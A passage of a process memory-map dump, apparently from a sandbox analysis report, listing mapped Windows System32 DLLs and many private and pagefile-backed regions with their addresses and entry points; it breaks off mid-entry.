"\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 731 start_va = 0x7ffd493e0000 end_va = 0x7ffd49924fff monitored = 0 entry_point = 0x7ffd4957a450 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 732 start_va = 0x7ffd49930000 end_va = 0x7ffd49b9efff monitored = 0 entry_point = 0x7ffd499e22b0 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\System32\\d3d10warp.dll" (normalized: "c:\\windows\\system32\\d3d10warp.dll") Region: id = 733 start_va = 0x7ffd49e00000 end_va = 0x7ffd49e4afff monitored = 0 entry_point = 0x7ffd49e172b0 region_type = mapped_file name = "uianimation.dll" filename = "\\Windows\\System32\\UIAnimation.dll" (normalized: "c:\\windows\\system32\\uianimation.dll") Region: id = 734 start_va = 0x7ffd49e50000 end_va = 0x7ffd4a000fff monitored = 0 entry_point = 0x7ffd49ee61a0 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 735 start_va = 0x7ffd4a010000 end_va = 0x7ffd4a0b1fff monitored = 0 entry_point = 0x7ffd4a030a40 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 736 start_va = 0x7ffd4a0c0000 end_va = 0x7ffd4a367fff monitored = 0 entry_point = 0x7ffd4a153250 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll") Region: id = 737 start_va = 0x7ffd4a370000 end_va = 0x7ffd4a391fff monitored = 0 entry_point = 0x7ffd4a371a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 738 start_va = 0x7ffd4a3d0000 end_va = 0x7ffd4a48dfff monitored = 0 entry_point = 0x7ffd4a412d40 region_type = mapped_file name = "coremessaging.dll" filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll") Region: id = 739 start_va = 0x7ffd4a490000 end_va = 0x7ffd4a572fff monitored = 0 entry_point = 0x7ffd4a4c7da0 region_type = mapped_file name = "dcomp.dll" filename = "\\Windows\\System32\\dcomp.dll" (normalized: "c:\\windows\\system32\\dcomp.dll") Region: id = 740 start_va = 0x7ffd4a880000 end_va = 0x7ffd4a8f8fff monitored = 0 entry_point = 0x7ffd4a89fb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 741 start_va = 0x7ffd4a940000 end_va = 0x7ffd4aa05fff monitored = 0 entry_point = 0x7ffd4a943ac0 region_type = mapped_file name = "cscui.dll" filename = "\\Windows\\System32\\cscui.dll" (normalized: "c:\\windows\\system32\\cscui.dll") Region: id = 742 start_va = 0x7ffd4aa70000 end_va = 0x7ffd4aaaffff monitored = 0 entry_point = 0x7ffd4aa83750 region_type = mapped_file name = "settingmonitor.dll" filename = "\\Windows\\System32\\SettingMonitor.dll" (normalized: "c:\\windows\\system32\\settingmonitor.dll") Region: id = 743 start_va = 0x7ffd4aab0000 end_va = 0x7ffd4af42fff monitored = 0 entry_point = 0x7ffd4aabf760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 744 start_va = 0x7ffd4af50000 end_va = 0x7ffd4afb6fff monitored = 0 entry_point = 0x7ffd4af6e710 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 745 start_va = 0x7ffd4afc0000 end_va = 0x7ffd4b00efff monitored = 0 entry_point = 0x7ffd4afc7ab0 region_type = mapped_file name = "inputswitch.dll" filename = "\\Windows\\System32\\InputSwitch.dll" (normalized: "c:\\windows\\system32\\inputswitch.dll") Region: id = 746 start_va = 0x7ffd4b010000 end_va = 0x7ffd4b195fff monitored = 0 entry_point = 0x7ffd4b05d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 747 start_va = 0x7ffd4b1a0000 end_va = 0x7ffd4b1bbfff monitored = 0 entry_point = 0x7ffd4b1a37a0 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 748 start_va = 0x7ffd4b1c0000 end_va = 0x7ffd4b1f4fff monitored = 0 entry_point = 0x7ffd4b1c3cc0 region_type = mapped_file name = "wscapi.dll" filename = "\\Windows\\System32\\wscapi.dll" (normalized: "c:\\windows\\system32\\wscapi.dll") Region: id = 749 start_va = 0x7ffd4b200000 end_va = 0x7ffd4b212fff monitored = 0 entry_point = 0x7ffd4b202760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 750 start_va = 0x7ffd4b220000 end_va = 0x7ffd4b244fff monitored = 0 entry_point = 0x7ffd4b222300 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 751 start_va = 0x7ffd4b280000 end_va = 0x7ffd4b2a4fff monitored = 0 entry_point = 0x7ffd4b295220 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 752 start_va = 0x7ffd4b2d0000 end_va = 0x7ffd4b302fff monitored = 0 entry_point = 0x7ffd4b2d3800 region_type = mapped_file name = "portabledevicetypes.dll" filename = "\\Windows\\System32\\PortableDeviceTypes.dll" (normalized: "c:\\windows\\system32\\portabledevicetypes.dll") Region: id = 753 start_va = 0x7ffd4b310000 end_va = 0x7ffd4b324fff monitored = 0 entry_point = 0x7ffd4b312850 region_type = mapped_file name = "wpdshserviceobj.dll" filename = "\\Windows\\System32\\WPDShServiceObj.dll" (normalized: "c:\\windows\\system32\\wpdshserviceobj.dll") Region: id = 754 start_va = 0x7ffd4b330000 end_va = 0x7ffd4b36bfff monitored = 0 entry_point = 0x7ffd4b3325e0 region_type = mapped_file name = "bthprops.cpl" filename = "\\Windows\\System32\\bthprops.cpl" (normalized: "c:\\windows\\system32\\bthprops.cpl") Region: id = 755 start_va = 0x7ffd4b470000 end_va = 0x7ffd4b505fff monitored = 0 entry_point = 0x7ffd4b495570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 756 start_va = 0x7ffd4b530000 end_va = 0x7ffd4b556fff monitored = 0 entry_point = 0x7ffd4b537940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 757 start_va = 0x7ffd4b670000 end_va = 0x7ffd4b719fff monitored = 0 entry_point = 0x7ffd4b697910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 758 start_va = 0x7ffd4b720000 end_va = 0x7ffd4b81ffff monitored = 0 entry_point = 0x7ffd4b760f80 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 759 start_va = 0x7ffd4b8b0000 end_va = 0x7ffd4b8d9fff monitored = 0 entry_point = 0x7ffd4b8b8b90 region_type = mapped_file name = "rmclient.dll" filename = "\\Windows\\System32\\rmclient.dll" (normalized: "c:\\windows\\system32\\rmclient.dll") Region: id = 760 start_va = 0x7ffd4bc90000 end_va = 0x7ffd4bd83fff monitored = 0 entry_point = 0x7ffd4bc9a960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 761 start_va = 0x7ffd4bf00000 end_va = 0x7ffd4bf0bfff monitored = 0 entry_point = 0x7ffd4bf027e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 762 start_va = 0x7ffd4bfe0000 end_va = 0x7ffd4c010fff monitored = 0 entry_point = 0x7ffd4bfe7d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 763 start_va = 0x7ffd4c040000 end_va = 0x7ffd4c0b9fff monitored = 0 entry_point = 0x7ffd4c061a50 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 764 start_va = 0x7ffd4c140000 end_va = 0x7ffd4c149fff monitored = 0 entry_point = 0x7ffd4c141830 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 765 start_va = 0x7ffd4c250000 end_va = 0x7ffd4c26efff monitored = 0 entry_point = 0x7ffd4c255d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 766 start_va = 0x7ffd4c3c0000 end_va = 0x7ffd4c41bfff monitored = 0 entry_point = 0x7ffd4c3d6f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 767 start_va = 0x7ffd4c470000 end_va = 0x7ffd4c486fff monitored = 0 entry_point = 0x7ffd4c4779d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 768 start_va = 0x7ffd4c590000 end_va = 0x7ffd4c59afff monitored = 0 entry_point = 0x7ffd4c5919a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 769 start_va = 0x7ffd4c620000 end_va = 0x7ffd4c659fff monitored = 0 entry_point = 0x7ffd4c628d20 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 770 start_va = 0x7ffd4c660000 end_va = 0x7ffd4c686fff monitored = 0 entry_point = 0x7ffd4c670aa0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 771 start_va = 0x7ffd4c770000 end_va = 0x7ffd4c79cfff monitored = 0 entry_point = 0x7ffd4c789d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 772 start_va = 0x7ffd4c900000 end_va = 0x7ffd4c955fff monitored = 0 entry_point = 0x7ffd4c910bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 773 start_va = 0x7ffd4c980000 end_va = 0x7ffd4c9a8fff monitored = 0 entry_point = 0x7ffd4c994530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 774 start_va = 0x7ffd4c9b0000 end_va = 0x7ffd4ca48fff monitored = 0 entry_point = 0x7ffd4c9df4e0 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 775 start_va = 0x7ffd4caf0000 end_va = 0x7ffd4cb03fff monitored = 0 entry_point = 0x7ffd4caf52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 776 start_va = 0x7ffd4cb10000 end_va = 0x7ffd4cb5afff monitored = 0 entry_point = 0x7ffd4cb135f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 777 start_va = 0x7ffd4cb60000 end_va = 0x7ffd4cb6ffff monitored = 0 entry_point = 0x7ffd4cb656e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 778 start_va = 0x7ffd4cb70000 end_va = 0x7ffd4cb7efff monitored = 0 entry_point = 0x7ffd4cb73210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 779 start_va = 0x7ffd4cb80000 end_va = 0x7ffd4cbc2fff monitored = 0 entry_point = 0x7ffd4cb94b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 780 start_va = 0x7ffd4cc80000 end_va = 0x7ffd4ccd4fff monitored = 0 entry_point = 0x7ffd4cc97970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 781 start_va = 0x7ffd4cce0000 end_va = 0x7ffd4d323fff monitored = 0 entry_point = 0x7ffd4cea64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 782 start_va = 0x7ffd4d350000 end_va = 0x7ffd4d516fff monitored = 0 entry_point = 0x7ffd4d3adb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 783 start_va = 0x7ffd4d5b0000 end_va = 0x7ffd4d664fff monitored = 0 entry_point = 0x7ffd4d5f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 784 start_va = 0x7ffd4d670000 end_va = 0x7ffd4d857fff monitored = 0 entry_point = 0x7ffd4d69ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 785 start_va = 0x7ffd4d860000 end_va = 0x7ffd4d8c9fff monitored = 0 entry_point = 0x7ffd4d896d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 786 start_va = 0x7ffd4d8d0000 end_va = 0x7ffd4da55fff monitored = 0 entry_point = 0x7ffd4d91ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 787 start_va = 0x7ffd4da60000 end_va = 0x7ffd4db7bfff monitored = 0 entry_point = 0x7ffd4daa02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 788 start_va = 0x7ffd4db80000 end_va = 0x7ffd4dc40fff monitored = 0 entry_point = 0x7ffd4dba0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 789 start_va = 0x7ffd4dc70000 end_va = 0x7ffd4deecfff monitored = 0 entry_point = 0x7ffd4dd44970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 790 start_va = 0x7ffd4def0000 end_va = 0x7ffd4def7fff monitored = 0 entry_point = 0x7ffd4def1ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 791 start_va = 0x7ffd4df00000 end_va = 0x7ffd4df9cfff monitored = 0 entry_point = 0x7ffd4df078a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 792 start_va = 0x7ffd4e160000 end_va = 0x7ffd4e1bafff monitored = 0 entry_point = 0x7ffd4e1738b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 793 start_va = 0x7ffd4e1c0000 end_va = 0x7ffd4e26cfff monitored = 0 entry_point = 0x7ffd4e1d81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 794 start_va = 0x7ffd4e270000 end_va = 0x7ffd4e2dafff monitored = 0 entry_point = 0x7ffd4e2890c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 795 start_va = 0x7ffd4e2e0000 end_va = 0x7ffd4e31afff monitored = 0 entry_point = 0x7ffd4e2e12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 796 start_va = 0x7ffd4e320000 end_va = 0x7ffd4e479fff monitored = 0 entry_point = 0x7ffd4e3638e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 797 start_va = 0x7ffd4e480000 end_va = 0x7ffd4e526fff monitored = 0 entry_point = 0x7ffd4e4958d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 798 start_va = 0x7ffd4e530000 end_va = 0x7ffd4e958fff monitored = 0 entry_point = 0x7ffd4e558740 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 799 start_va = 0x7ffd4e9d0000 end_va = 0x7ffd4eb25fff monitored = 0 entry_point = 0x7ffd4e9da8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 800 start_va = 0x7ffd4eb30000 end_va = 0x7ffd5008efff monitored = 0 entry_point = 0x7ffd4ec911f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 801 start_va = 0x7ffd500f0000 end_va = 0x7ffd50141fff monitored = 0 entry_point = 0x7ffd500ff530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 802 start_va = 0x7ffd50150000 end_va = 0x7ffd501f6fff monitored = 0 entry_point = 0x7ffd5015b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 803 start_va = 0x7ffd50200000 end_va = 0x7ffd5026efff monitored = 0 entry_point = 0x7ffd50225f70 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll") Region: id = 804 start_va = 0x7ffd50380000 end_va = 0x7ffd504c2fff monitored = 0 entry_point = 0x7ffd503a8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 805 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 807 start_va = 0x420000 end_va = 0x435fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 808 start_va = 0xfbd0000 end_va = 0xfc4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fbd0000" filename = "" Region: id = 809 start_va = 0x90d0000 end_va = 0x921ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000090d0000" filename = "" Region: id = 810 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 811 start_va = 0xfc50000 end_va = 0xfccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fc50000" filename = "" Region: id = 812 start_va = 0xfcd0000 end_va = 0xfd4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fcd0000" filename = "" Region: id = 813 start_va = 0x440000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 814 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 815 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 816 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 817 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 818 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 819 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 820 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 821 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 822 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 823 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 824 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 825 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 826 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 827 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 828 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 829 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 830 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 831 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 832 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 833 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 834 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 835 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 836 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 837 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 838 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 839 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 840 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 841 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 842 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 843 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 844 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 845 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 846 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 847 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 848 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 849 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 850 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 851 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 852 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 853 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 854 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 855 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 856 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 857 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 858 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 859 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 860 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 861 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 862 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 863 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 864 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 865 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 866 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 867 start_va = 0x440000 end_va = 0x44efff 